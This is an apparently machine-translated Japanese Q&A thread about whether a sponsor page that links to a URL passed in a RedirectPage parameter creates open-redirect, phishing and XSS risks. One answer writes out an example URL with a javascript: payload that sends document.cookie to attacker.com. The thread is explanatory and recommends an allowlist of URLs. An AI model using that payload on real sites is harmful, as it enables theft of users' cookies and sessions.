ここでWebセキュリティの問題を見つけることができますか？

Question

次のような別のWebページにリダイレクトするWebページがあります：

http://www.myOtherServer.com/Sponsor.php?RedirectPage=http://mylink.com/whereIwasgoingtogo.html

その後、Sponsor.phpページには、「ページに進む」というリンクを含む広告が表示されます。渡されたRedirectPageにリンクします。これに起因するセキュリティ/スプーフィングの問題はありますか？これを処理する最良の方法は何ですか？ （ユーザーはどちらのサイトにもログインしていないことに注意してください）

Answer 1

これは大きな問題です。次のようなリンクを送信した場合：

 http://cnn.com/sponsor.php?redirectpage=http://bit.ly/jh2l14

「ああ、CNN、それは合法的なサイトだ」と考えて、それを開いて[ページに進む]リンクをクリックします。そして、あなたはネット上で最も厄介なポルノサイトの1つに参加し、同僚全員に巨大なブームの男性の声が聞こえます＆quot; Hot Damn I Want to！@ $ @＃$ Your ！（＆amp;＆＃164;＆amp; ^ $＆＃167;できないまで＆＃161;＆＃8976; ^（！＃~~＆amp; $ ^＃！@ $ !! ＆quot ;そして、上司に説明する必要があります＆quot;私はそれがCNNだと思った！＆quot;

ここでの穴は、あなたの評判です。このようなブラインドリダイレクトは危険です。

そしてそれはただ一つの穴です。これはどうですか？

 http://cnn.com/sponsor.php?redirectpage=javascript:location.href='http://attacker.com/' + document.cookie

サイトをXSSで編集し、ユーザーのCookieを盗みました。もちろん、ログイン情報はありませんが、セッションデータはどうですか？または、後でログインを追加する場合、または社内の他の誰かが1年後にこのページを使用してユーザーがログインする場合。

Answer 2

これは間違いなくセキュリティ上のリスクです。セキュリティが関係する場合は、URL内変数を使用しないでください。

完全に安全なものはありませんが、これはこの問題を処理するためのはるかに優れた方法です。 http： //www.webmasterworld.com/forum88/2910.htm

Answer 3

sponsor.phpがRedirectPageに任意の値を許可し、広告が推奨を暗示している場合、またはフィッシング攻撃の一部であると考えられるように人々が正しい道を進んでいると考えるよう促します。さらに悪いことに、これらの攻撃から利益を得ている可能性があり、人々を不快にさせる可能性があります。

許可されたURL（または追跡可能なパターン）のリストを保持することは、問題を防ぐのに大いに役立ちます。